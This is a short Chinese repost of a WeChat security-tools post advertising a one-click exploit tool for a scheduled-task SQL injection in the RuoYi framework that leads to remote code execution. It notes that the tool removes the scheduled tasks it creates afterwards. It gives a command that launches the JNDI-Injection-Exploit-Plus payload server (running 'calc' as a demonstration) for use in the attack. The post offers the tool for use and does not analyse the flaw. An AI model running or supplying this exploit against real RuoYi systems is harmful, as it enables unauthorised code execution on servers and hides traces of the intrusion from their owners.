若依最新定时任务SQL注入可导致RCE漏洞的一键利用工具, 扫描和漏洞利用结束会自行删除所创建的定时任务。
一、单个检测
二、漏洞利用
java8 -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar -C calc -A 127.0.0.1
然后我们使用该工具的JNDI模块进行一键利用
原文始发于微信公众号(Web安全工具库):最新定时任务SQL注入可导致RCE漏洞的一键利用工具(3月3日更新)
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论